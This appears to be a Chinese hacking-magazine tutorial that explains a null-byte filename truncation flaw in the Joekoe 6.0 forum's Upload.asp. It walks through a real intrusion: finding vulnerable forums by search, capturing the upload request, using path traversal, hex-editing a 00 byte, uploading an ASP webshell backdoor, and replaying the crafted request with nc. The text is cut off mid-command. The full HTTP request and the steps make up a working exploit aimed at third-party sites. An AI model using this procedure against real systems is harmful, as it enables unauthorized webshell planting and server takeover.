作者:勇哥 转自:情感网络
前一阵动网Upfile.asp文件漏洞真可谓影响深远。把空格(ASC为20H)改成为空(ASC为00H)也就是符串结束符“\0”来成功欺骗计算机,这种提交数据的方式使我深受启发,由此才有此文:乔客6.0的Upload.asp漏洞。同时,也把本篇文章作为的一件最好的生日礼物,献给我最漂亮、最善解人意的女朋友俊俊!
漏洞危害:
1.用户可以随意建目录。
2.用户可以上传任意后缀名的文件。
下面先来看一下在Upload.asp文件中存在的如下代码:
if not MyFso.folderExists(up_path) then
set up_path=MyFso.CreateFolder(up_path)
end if
如果上传目录不存在,会自动创建,这样我们就可以随便建目录了。再看:
upfile_name=up_name&"."&upfile_name
upfile.SaveAs up_path&upfile_name
可见上传后文件名是:“upfile_name=up_name&"."&upfile_name”,其中Up_name由年、月、日和一个随机数组成,如:2004610173526,而“.”后面的Upfile_name为合法的后缀名,如GIF,本来这是很正常的改名方式,但是计算机在检测字符串时是看是否碰到“\0”字符,如果是,则认为字符串结束了。也就是说我们在构造上传文件名时,只要欺骗计算机,把“2004610173526”文件名改成“2004610173526.asp\0”这样的方式,后面一连串的时间字符我们都可以不要了,从而达到直接将文件名保存为我们定义的文件名的目的。原理是枯燥的,实例才最有趣,下面给大家讲一个详细的利用这个漏洞入侵某论坛的例子。
漏洞利用:
首先在百度里搜索关键字“版本:Joekoe V6.0”,然后会出现好多这样的论坛,我们随便挑一个论坛去注册,然后再打开论坛的任意一个版块如“笑话天地”(http://www.******.com/bbs/forum_list.asp?forum_id=9),点击左上角的“发表新贴”按钮(http://www.******.com/bbs/forum_write.asp?forum_id=9),发新帖子。
上面的准备工作做完后,下面我们就可以正式开始挑战这个论坛了。需要用到的工具有WinSock Expert V0.6 beta 1、UltraEdit、NC、ASP后门和新鲜鸡蛋几只,均可在光盘中找到(咳,鸡蛋是给大家吃的,可别用来扔我,呵呵)。下面我们正式开始:
运行WinSock Expert->点“open process”按钮->打开IExplore.exe进程,选中第二步打开的网页(某某论坛-笑话开地,发表新贴)->点“open”按钮,这样WinSock Expert就可以监听刚才打开的网页的一举一动了。我们的目的是想要抓取数据上传的包并做进一步的修改。
然后使用“上传文件”这一功能,浏览上传我们的ASP后门。我用的是“冰狐浪子微型ASP后门”,成功后再配合“海阳顶端2004”一起发挥作用,效果还不错,大家可以考虑这种配合方式。点击“上传”后,页面会出现“上传失败:文件类型只能为gif、jpg、bmp、swf、rar、zip等格式,返回上一页”,不用理会它,现在我们需要的就是这样的信息。
赶紧到WinSock Expert中提取抓获的有用数据,内容如下:
POST /bbs/upload.asp?action=upfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.******.com/bbs/upload.asp?uppath=forum&upname=&uptext=jk_word
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d311f101009c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: www.******.com
Content-Length: 710
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: joekoe%5Fonline=onlines=1&login%5Fpassword=fb411be97b3b0d48&guest%5Fname=&iscookies=yes&login%5Fusername=test; ASPSESSIONIDASQQAATR=CNBCLACDOHPJIDDNHLCCICLP
-----------------------------7d311f101009c
Content-Disposition: form-data; name="up_path"
forum
-----------------------------7d311f101009c
Content-Disposition: form-data; name="up_name"
200473153438
-----------------------------7d311f101009c
Content-Disposition: form-data; name="up_text"
jk_word
-----------------------------7d311f101009c
Content-Disposition: form-data; name="file_name1"; filename="C:\Xy\temp\dvupfile\binghu.asp"
Content-Type: text/html
-----------------------------7d311f101009c
Content-Disposition: form-data; name="submit"
点击上传
-----------------------------7d311f101009c—
注意你可以将自己抓的包同我的对比,有些地方是不同的,但大体一样,特别要注意最后的“7d311f101009c”后面有个回车,一定要拷贝下来,因为它会影响Content-Length:的长度。再打开UltraEdit,创建一新文件,把第三步用“WinSock Expert”抓的内容复制进去。看过动网上传漏洞分析的朋友都知道,因为在Upload.asp文件中对上传文件的类型做了限制,所以直接上传ASP文件是不行的,我们要把“binghu.asp”文件改成“binghu.gif”。这里的Forum是默认的上传目录,我们可以任意改名,如改成havebug(Content-Length:对应的数字就多了2),也可以改成Forum/../../havebug(Content-Length:对应的数字就多了14),后者是把Havebug建到BBS目录下。这里需要非常小心,因为多一个字母Content-Length的长度就应该增加1,多一个汉字长度应加2。同时,很多网管把这个目录设置成了禁止执行ASP文件,可以利用“../”把地址指向论坛主目录下,总不会有人不让论坛运行吧!
下面是比较细致的工作了:200473153438是上传的文件名,我们可以改成Hacker.asp并在后面加入一个空格,然后再在UltraEdit里按Ctrl+H进入十六进制编辑,将空格符的20改成00,这样两个长度长度正好一样都为12,省下改Content-Length了。最后保存文件名为:qiaoke.txt。
修改好了,我们需要将这个数据提交给服务器,这里所用工具是“瑞士军刀——NC”,黑防的光盘上每期都有,大家赶紧去翻出来吧。命令格式是:
nc –vv http://www.******.com 80 |
上传成功:收藏
分享
|
|
|
|
|
|
|
|
